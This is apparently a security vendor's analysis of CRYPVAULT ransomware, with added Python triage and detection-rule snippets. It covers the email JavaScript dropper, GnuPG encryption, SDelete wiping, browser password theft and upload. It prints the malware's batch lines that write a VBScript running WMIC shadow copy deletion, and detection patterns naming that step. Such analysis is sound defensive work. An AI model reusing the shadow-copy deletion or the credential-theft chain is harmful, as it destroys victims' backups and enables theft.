We uncovered a new crypto-ransomware variant with new routines that include making encrypted files appear as if they were quarantined files. These files are appended with a *.VAULT file extension, mimicking the vault feature of antivirus software that keeps quarantined files for a certain period of time. Antivirus software typically quarantines files that may potentially cause further damage to an infected system.

Infection chain

Arrival Vector

The malware arrives on affected systems via an email attachment. When users execute the attached malicious JavaScript file, it downloads four files from its C&C server:

Crypto-ransomware detected as BAT_CRYPVAULT.A

SDelete – Microsoft Sysinternals tool (will be renamed to audiodg.exe by the malware)

GnuPG – executable open-source encryption tool (will be renamed to svchost.exe by the malware)

Library file of GnuPG (will be renamed to iconv.dll by the malware)

The downloaded files are saved in the %User Temp% folder, after which the script executes the crypto-ransomware.

Figure 1. Email attachment named – Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js

I observed that the cybercriminals may have purposely added strings found in known virus scanner logs (such as those of AVG and Microsoft) to the attachment name in order to bypass their scan engines.

Encryption Routine

Upon execution, the malware installs an open source encryption tool called GNU Privacy Guard (GnuPG) on the affected system and uses it to start the encryption process. GnuPG generates an RSA-1024 public and private key pair used in the encryption of the user's files.

Figure 2. Generated files of GnuPG (private – secring.gpg and public – pubring.gpg)

It then looks for files to encrypt. The file extensions it targets are as follows:

*.xls

*.doc

*.pdf

*.rtf

*.psd

*.dwg

*.cdr

*.cd

*.mdb

*.1cd

*.dbf

*.sqlite

*.jpg

*.zip

Figure 3. The malware searches for files matching its list of file extensions and encrypts each file using a file it drops called svchost.exe (a GnuPG executable)

The malware skips the following folders to avoid causing system malfunction:

abbyy

adobe

amd64

application

autograph

avatar

avatars

cache

clipart

com_ intel

common

csize

framework64

games

guide

internet

library

manual

maps

msoffice

profiles

program

recycle

resource

resources

roaming

sample

setupcache

support

template

temporary

texture

themes

thumbnails

uploads

windows

After encrypting the user’s files, the malware will then append a *.vault file extension.
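As an added example (not code from the original post or from the malware itself), the following Python triage helper walks a directory for *.vault files and checks whether each begins the way GnuPG output does, with an OpenPGP public-key encrypted session key packet or ASCII armor; the packet bytes used for testing are constructed, and the walk assumes encrypted files keep the .vault suffix described above.

```python
"""Triage helper for CRYPVAULT-style encryption: find *.vault files and check
whether each starts like GnuPG output, i.e. an OpenPGP public-key encrypted
session key (PKESK) packet (RFC 4880 sections 4.2 and 5.1) or ASCII armor."""
import os

PKESK_TAG = 1  # packet tag of a public-key encrypted session key

def parse_packet_header(data: bytes):
    """Return (tag, body_length) of the first OpenPGP packet, or None if not OpenPGP."""
    if not data or not data[0] & 0x80:
        return None
    first = data[0]
    if first & 0x40:                       # new-format header: tag in low 6 bits
        tag = first & 0x3F
        if len(data) < 2:
            return tag, None
        l1 = data[1]
        if l1 < 192:
            return tag, l1                 # one-octet length
        if l1 < 224 and len(data) >= 3:
            return tag, ((l1 - 192) << 8) + data[2] + 192   # two-octet length
        return tag, None                   # partial or five-octet length not parsed
    tag = (first >> 2) & 0x0F              # old-format header: tag in bits 2-5
    ltype = first & 0x03
    if ltype == 3:
        return tag, None                   # indeterminate length
    nbytes = (1, 2, 4)[ltype]
    if len(data) < 1 + nbytes:
        return tag, None
    return tag, int.from_bytes(data[1:1 + nbytes], "big")

def looks_gpg_encrypted(head: bytes) -> bool:
    """True if the file head is armored or begins with a PKESK packet."""
    if head.startswith(b"-----BEGIN PGP MESSAGE-----"):
        return True
    hdr = parse_packet_header(head)
    return hdr is not None and hdr[0] == PKESK_TAG

def find_vault_files(root: str):
    """Walk root; return (path, looks_gpg_encrypted) for every *.vault file."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".vault"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    hits.append((path, looks_gpg_encrypted(fh.read(32))))
    return hits
```

A .vault file whose head is not OpenPGP at all is worth a second look, since it may have been renamed rather than encrypted.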

Ransom Notes

The malware uses the following script to make the affected system display the ransom note when an encrypted file is opened:

Figure 4: Script used by the malware to display the ransom note


After encryption, the malware changes the icon associated with the *.vault file extension to a padlock icon. Each “locked” and encrypted file displays a ransom note when opened, as shown in the image below.

Figure 5. Opening any of the files encrypted by BAT_CRYPVAULT.A leads to a ransom note displayed by VaultCrypt. Users will need to upload the Vault key file that the malware drops in the desktop folder to gain access to the site.

The malware also drops a .TXT file and displays a message on the infected system’s desktop instructing users on how to pay the ransom price in order to decrypt the files. We observed that this particular attack appears to target users in Russian-speaking countries as the attached file name, ransom note, and ransomware support portal are all in Russian.

Figure 6. The dropped file VAULT.txt, written in Russian, is found in the Desktop folder. It provides instructions on how to decrypt the files.

Figure 7. Ransom note via an HTML Application (.HTA) file that is displayed on the infected system’s desktop after the encryption of the user’s files

Deleting backup, traces of encryption, and malware components

The malware deletes the key files secring.gpg, vaultkey.vlt and confclean.lst using SDelete, a Microsoft Sysinternals tool. SDelete is capable of overwriting a deleted file’s disk data, which makes it difficult or nearly impossible to recover deleted files.

Though this isn’t the first time we’ve seen SDelete used in crypto-ransomware attacks, it appears to be the first time malware has used 16 overwrite passes to make sure that recovery tools have a hard time reconstructing the deleted files. This tool arrives on the affected system together with the ransomware.

Figure 8. Key files deleted that were used in the encryption process

Figure 9. The malware deletes the key files using SDelete

The malware also deletes shadow volume copies if they exist on the system, using a VBScript it writes to %temp%\win.vbs:

echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"

Figure 10. The malware deletes its components at the end of its routine

Downloads info-stealing malware

The malware also downloads and executes a hacking tool called Browser Password Dump by SecurityXploded from its C&C server. The tool is capable of extracting stored login passwords from the following web browsers:

Mozilla Firefox

Internet Explorer

Google Chrome

CoolNovo

Opera Browser

Safari

Flock

SeaMonkey

SRWare Iron

Comodo Dragon

After the tool finishes executing, the malware resumes control and drops a Visual Basic script called up.vbs that uploads the password dump report to the C&C server.
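As an added example not from the original post, the following Python detection logic flags process-creation events matching the cleanup and exfiltration steps described above (the renamed SDelete wiping key files with 16 passes, the WMIC shadow copy deletion, GnuPG running as svchost.exe from Temp, and the up.vbs upload script). The event shapes, the use of SDelete's -p pass-count switch and the wscript launch of win.vbs/up.vbs are assumptions, since the post does not show the exact command lines.

```python
"""Detection logic for CRYPVAULT's post-encryption behaviour: renamed tools
running from Temp, a 16-pass SDelete wipe of key files, WMIC shadow copy
deletion and the dropped VBScript runners. All events below are constructed
assumptions for illustration, not captured telemetry."""
import ntpath
import re

# Legitimate Windows binary names the malware reuses for its dropped components
REUSED_NAMES = {"svchost.exe", "audiodg.exe"}

RULES = [
    ("shadow copy deletion via WMIC",
     re.compile(r"wmic(\.exe)?\b.*\bshadowcopy\s+delete", re.I)),
    ("16-pass SDelete wipe of key material",      # -p <passes> is SDelete's pass count
     re.compile(r"-p\s*16\b.*\.(gpg|vlt|lst)\b", re.I)),
    ("dropped VBScript run from %temp%",          # assumed wscript/cscript launch
     re.compile(r"(wscript|cscript)(\.exe)?\b.*\\temp\\(win|up)\.vbs\b", re.I)),
]

def classify_event(image: str, command_line: str):
    """Return the indicator names matched by one process-creation event."""
    hits = []
    low_image = image.lower()
    # svchost.exe and audiodg.exe never legitimately live in a user's Temp folder
    if ntpath.basename(low_image) in REUSED_NAMES and "\\temp\\" in low_image:
        hits.append("system binary name executing from Temp")
    for name, pattern in RULES:
        if pattern.search(command_line):
            hits.append(name)
    return hits

# Constructed sample events: (image path, command line)
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    (r"C:\Users\u\AppData\Local\Temp\svchost.exe", "svchost.exe"),
    (r"C:\Users\u\AppData\Local\Temp\audiodg.exe",
     r'audiodg.exe -p 16 "C:\Users\u\AppData\Roaming\gnupg\secring.gpg"'),
    (r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe shadowcopy delete /nointeractive"),
    (r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\u\AppData\Local\Temp\up.vbs"'),
]

def scan(events=SAMPLE_EVENTS):
    """Return only the events that matched at least one indicator."""
    results = [(img, classify_event(img, cmd)) for img, cmd in events]
    return [(img, hits) for img, hits in results if hits]
```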

Conclusion

We’ve also noticed that despite being a new crypto-ransomware variant, CRYPVAULT appears to possess limited functionality, as it is not written in a conventional programming language; rather, it was written as a batch script. It also doesn’t import any libraries or define functions, and the components bundled with the malware carry out the bulk of its malicious routines. This shows how easy it is for cybercriminals to create new crypto-ransomware variants.

Ransomware is becoming the next big thing among threat actors. Making important user files unusable forces more people to pay the ransom. As more ransomware appears in the wild, users are advised to back up their files on a regular basis.

Related hashes:


Update as of April 7, 2015, 11:00 P.M. PST:

We have edited the first paragraph of the entry to clarify a statement about the quarantined files.

Credit goes to keydet89 (@keydet89), Ryan Kazanciyan (@ryankaz42), and InfoSec Taylor Swift (@SwiftonSecurity) for initiating a discussion about the description of the files.